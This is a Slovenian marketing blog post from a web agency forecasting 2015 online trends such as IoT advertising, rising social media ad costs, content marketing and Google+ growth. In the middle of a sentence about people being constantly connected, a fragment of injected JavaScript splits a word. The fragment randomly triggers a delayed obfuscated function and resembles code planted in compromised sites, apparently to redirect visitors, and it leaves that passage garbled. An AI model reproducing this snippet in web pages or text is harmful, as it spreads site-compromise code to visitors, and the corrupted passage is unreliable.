fbpx

Spletni trendi v 2015

Spletni trendi v 2015

Leto 2014 se je izteklo, vas in nas pa že zanimajo spletni trendi za leto 2015. V spletni agenciji Webby smo zato samo za vas pripravili nekaj trendov, za katere menimo, da jim bo v tem letu namenjene največ pozornosti.

Marketing se bo iz spleta selil na internet

Se sprašujete kaj za vraga mislimo s tem? Internet, splet. Splet, internet. Saj je vse isto kajne? Trditev ne bi mogla biti dlje o resnice! Poglejmo tipičen dan »naprednega« uporabnika, mladostnika, ki je ravnokar končal študij in se veselo zaposlil.

Ko se zjutraj zbudi, najprej preveri kaj se dogaja na Facebook-u. Na poti v službo na mobilniku zažene SoundCloud app in posluša najljubšo glasbo. V službi večino časa zapravi za prebiranje in odgovarjanje na elektronsko pošto. Ko služba zahteva obisk stranke za navigacijo uporabi Google maps. Ko je na malici izkoristi čas, da na svoji tablici zažene aplikacijo svojega najljubšega ponudnika dnevnih novic in prebere vse aktualne objave. Na poti domov ponovno posluša glasbo, tokrat na YouTube app-u. Doma obvezno vsaj še enkrat preveri stanje na omrežju Facebook, po vsej verjetnosti kar na televiziji, saj jo je ravnokar priklopil na internet. Zvečer pa na njej pogleda kakšen dober film ali pa s prijatelji odigra najljubšo igro na domači Xbox konzoli…

Ampak kaj vse to pravzaprav pomeni? Pomeni to, da so dandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andanes ljudje večino dneva »priklopljeni na internet«, kar pa še ne pomeni, da so tudi na spletu. Svetovni splet (www) je namreč samo en del vsega tistega, kar je predstavlja internet. Ljudje imajo vedno več naprav (mobitel, tablica, televizija, pametne ure in očala itd.), ki so tako ali drugače priklopljene na internet. In leto 2015 bo prelomno v tem smislu, da se bo oglaševanje iz spleta premaknilo tudi na ostale segmente celote, ki jo poznamo kot IoT (Internet of Things).

Družbena omrežja bodo postala vedno dražja

Večina največjih družbenih omrežij (Twitter, Facebook, Pinterest, Instagram) je že uvedla, ali pa še bo uvedla dodatne načine trženja oglaševalskega prostora. Organsko iskanje (Google search) bo v veliki meri nadomestil plačljiv promet in podjetja bodo praktično prisiljena v povečanje oglaševalskega budgeta, vsaj v kolikor bodo želela, da bodo njihova prizadevanja na družbenih omrežjih tudi dosegla zadane cilje.

Kvaliteten vsebinski marketing bo postal še pomembnejši

V letu 2014 je bilo opaziti občuten napredek na področju vsebinskega marketinga saj so podjetja spoznala, kako pomemben faktor ta oblika »oglaševanja« pravzaprav predstavlja. In ta trend se bo v letu 2015 samo še okrepil. Priprava zanimivih, poučnih in kvalitetnih vsebin, ki jih bodo bralci želeli deliti naprej bo eden glavnih ciljev marketinga v letu 2015.

Google+ se bo približal konkurenci

Google+ ima še vedno velik potencial za rast. Širok spekter prednosti, ki jih to omrežje nudi, bo Google+ v letu 2015 približal konkurenci. Uporabniki bodo spoznali dodano vrednost prisotnosti na tem omrežju, kar bo pozitivno vplivalo na rast števila uporabnikov.

Novo leto, nove inovacije

Leto 2015 bo torej tako kot že zadnjih nekaj prav gotovo zelo zanimivo. Živimo namreč v času, ko nam pravzaprav vsako leto prinese kar nekaj novosti. Samo pomislite, Pred dvema stoletjem (1800 -1900) so ljudje v svojem celem življenju doživeli samo spremembo ali dve (lokomotiva, elektrika), ki so v večji meri vplivale na kvaliteto njihovega življenja. Naslednje stoletje (1900 – 2000) pa je že prineslo bistveno več korenitih sprememb (avtomobil, letalo, nuklearna fuzija, računalnik, internet) in drastično spremenilo način življena. Ampak vse to ni nič napram zadnjih 14 let (2000 – 2014). V tem času je namreč prišlo do eksplozije tehnoloških inovacij. Dobili smo digitalno glasbo, bluetooth, YouTube, Facebook, pametne telefone, pametne ure, pametna očala, računalništvo v oblaku, navidezno resničnost, električni in samo vozeči avtomobili so postali realnost,… Tehnologija vstopa v naša življenja z neverjetno hitrostjo. In vse to je imelo velik vpliv na nas. Hitro pa smo se navadili na takšen naval novih tehnoloških rešitev in danes že praktično zahtevamo vedno nove in nove inovacije kar na letni ravni. Naša neusahljiva želja po novostih pa se bo prav gotovo nadaljevala tudi v letu 2015 in podjetja, ki bodo znala to izkoristiti in unovčiti bodo pustila konkurenco daleč za sabo.

0 Komentarjev

Odgovori

Vaš e-naslov ne bo objavljen. * označuje zahtevana polja

*